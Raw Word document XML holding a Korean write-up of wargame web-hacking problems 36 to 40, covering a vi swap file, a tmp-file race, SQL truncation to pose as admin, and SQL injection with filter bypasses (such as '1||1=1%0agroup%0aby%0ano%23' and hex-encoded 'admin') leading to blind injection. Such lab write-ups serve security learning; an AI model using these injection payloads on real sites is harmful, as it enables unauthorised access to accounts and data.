        <w:t>prob36</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0965F0AB" wp14:editId="591FE40F">
            <wp:extent cx="752475" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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t xml:space="preserve">vi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">도중 </w:t>
      </w:r>
      <w:r>
        <w:t>blackout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이니 </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>swp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 파일이 생성되었을 것이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C514D" w:rsidRDefault="007C514D" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD7A86F" wp14:editId="26304841">
            <wp:extent cx="5629275" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제가 막혔다고 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C514D" w:rsidRPr="007C514D" w:rsidRDefault="007C514D" w:rsidP="007C514D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C514D">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="007C514D">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob37</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C514D" w:rsidRDefault="007C514D" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67971703" wp14:editId="741419AE">
            <wp:extent cx="3733800" cy="5753100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1031CC81" wp14:editId="70A0CEFB">
            <wp:extent cx="4410075" cy="6086475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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74" w:rsidRDefault="00305874" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71FAA467" wp14:editId="286CF6B6">
            <wp:extent cx="3790950" cy="7400925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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74" w:rsidRDefault="007C514D" w:rsidP="005B6778">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/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t>-$time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 파일을 </w:t>
      </w:r>
      <w:r w:rsidR="00305874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">항상 한 번씩 만들고 </w:t>
      </w:r>
      <w:r w:rsidR="00305874">
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidR="00305874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 쓴다. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C514D" w:rsidRDefault="00305874" w:rsidP="005B6778">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.number</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 파일 수를 적고 </w:t>
      </w:r>
      <w:r>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">개가 넘어가면 파일을 모두 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unlink </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305874" w:rsidRDefault="00305874" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">우리가 올린 파일 명은 </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 필터링 되어서 올려지고 거기에는 자신의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 써진다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305874" w:rsidRDefault="00305874" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">그리고 </w:t>
      </w:r>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 만들어 1</w:t>
      </w:r>
      <w:r>
        <w:t>27.0.0.1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-$tim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써져있는</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) 값으로 </w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305874" w:rsidRDefault="00305874" w:rsidP="005B6778"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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>$time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 올려지고 우리가 해당 시간파일과 동일한 이름으로 우리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쓰면 덮어씌울 수 있지 않을까 생각해보았다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305874" w:rsidRDefault="00305874" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711DD6EA" wp14:editId="7813AAC8">
            <wp:extent cx="2200275" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="9525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t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 대기를 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하고.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00305874" w:rsidRDefault="00305874" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">값을 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">overwrite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시켜주면 되지만 포트 포워딩도 안되고 웹서버도 없어서 gg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305874" w:rsidRPr="008B7B49" w:rsidRDefault="008B7B49" w:rsidP="008B7B49">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B7B49">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="008B7B49">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob38</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B7B49" w:rsidRDefault="00A51C7C" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15291108" wp14:editId="11EB3039">
            <wp:extent cx="3295650" cy="1209675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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0E5D63" wp14:editId="445888B6">
            <wp:extent cx="1962150" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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t>123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 로그인 했더니</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그 내역이 남았다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기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이용해서</w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 이름으로 로그를 남기면 될 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51C7C" w:rsidRDefault="00A51C7C" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="379D0003" wp14:editId="7BB77673">
            <wp:extent cx="2228850" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">왜 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>안되는거지</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>.?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A51C7C" w:rsidRDefault="00A51C7C" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D022EE7" wp14:editId="66BC1760">
            <wp:extent cx="5731510" cy="2720975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">내 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r>
        <w:t>og</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 남기는 것이 문제였나 보다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51C7C" w:rsidRPr="00A51C7C" w:rsidRDefault="00A51C7C" w:rsidP="00A51C7C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A51C7C">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51C7C">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob39</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51C7C" w:rsidRDefault="00A51C7C" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47013BA6" wp14:editId="23DACE78">
            <wp:extent cx="5731510" cy="702310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A101B87" wp14:editId="5F4D7BD3">
            <wp:extent cx="5731510" cy="2140585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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9362BA" w:rsidP="005B6778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분에</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>콤마</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 하나가 빠져 있으므로 </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r>
        <w:t>‘’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 바꾸고 1</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">글자를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>짜르므로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A51C7C" w:rsidRPr="00A51C7C">
        <w:t>admin         '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면 뒤에서 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하나가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>짤리면서</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r>
        <w:t>olve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009362BA" w:rsidRDefault="009362BA" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12439214" wp14:editId="14477158">
            <wp:extent cx="5731510" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="254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362BA" w:rsidP="009362BA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009362BA">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="009362BA">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009362BA" w:rsidRDefault="009362BA" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7640F962" wp14:editId="266ED735">
            <wp:extent cx="2876550" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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362BA" w:rsidP="009362BA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>injetcion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인 것 같은데 n</w:t>
      </w:r>
      <w:r>
        <w:t>o, id, pw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 모두 테스트를 해보자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009362BA" w:rsidRDefault="009362BA" w:rsidP="009362BA"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 w:rsidRPr="009362BA">
        <w:t>1 or 1=1</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 넣었을 때 </w:t>
      </w:r>
      <w:r>
        <w:t>access denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 뜬다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009362BA" w:rsidRDefault="009362BA" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07AE3F89" wp14:editId="7A77A8EB">
            <wp:extent cx="1666875" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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777A0" w:rsidP="009362BA"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 w:rsidRPr="009777A0">
        <w:t>1&amp;&amp;1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 넣었을 때는 </w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 뜬다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009777A0" w:rsidRDefault="009777A0" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5269922A" wp14:editId="6611E64F">
            <wp:extent cx="1866900" cy="904875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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A0" w:rsidRDefault="009777A0" w:rsidP="009362BA"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>
        <w:t>1||1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 넣어도 </w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 뜬다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009777A0" w:rsidRDefault="009777A0" w:rsidP="009362BA">
      <w:r w:rsidRPr="009777A0">
        <w:lastRenderedPageBreak/>
        <w:t>1||1=1#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>도 뜨는 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009777A0" w:rsidRDefault="009777A0" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">imit, order by, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공백이 필터링 되어 있고 </w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 필터링이 안되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009777A0" w:rsidRDefault="009777A0" w:rsidP="009362BA">
      <w:r w:rsidRPr="009777A0">
        <w:t>1||1=1</w:t>
      </w:r>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="009777A0">
        <w:t>group</w:t>
      </w:r>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="009777A0">
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="009777A0">
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 값을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>뽑아내보려</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 했으나 필터링이 되어 있</w:t>
      </w:r>
      <w:r w:rsidR="005B1A63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A63" w:rsidRDefault="005B1A63" w:rsidP="009362BA">
      <w:r w:rsidRPr="005B1A63">
        <w:t>no=1||1=1%0agroup%0aby%0ano%23&amp;id=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1A63">
        <w:t>guest&amp;pw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1A63">
        <w:t>=guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로는 값이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>뽑아와진다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A63" w:rsidRDefault="005B1A63" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694E955E" wp14:editId="6AA321E7">
            <wp:extent cx="5731510" cy="528320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080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63" w:rsidRDefault="005B1A63" w:rsidP="009362BA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가져왔더니 패스워드를 입력하라고 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>한다.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0008097E" w:rsidRDefault="0008097E" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>즉,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blind </w:t>
      </w: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해야겠다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7E72" w:rsidRDefault="008E7E72" w:rsidP="009362BA">
      <w:r w:rsidRPr="008E7E72">
        <w:t>no=</w:t>
      </w:r>
      <w:r>
        <w:t>1|</w:t>
      </w:r>
      <w:r w:rsidRPr="008E7E72">
        <w:t>|id=0x61646D696E&amp;id=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E7E72">
        <w:t>guest&amp;pw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E7E72">
        <w:t>=guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 로 했을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">때 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 나오고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7E72" w:rsidRDefault="008E7E72" w:rsidP="009362BA">
      <w:r w:rsidRPr="008E7E72">
        <w:t>no=2||id=0x61646D696E&amp;id=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E7E72">
        <w:t>guest&amp;pw</w:t>
      </w:r>
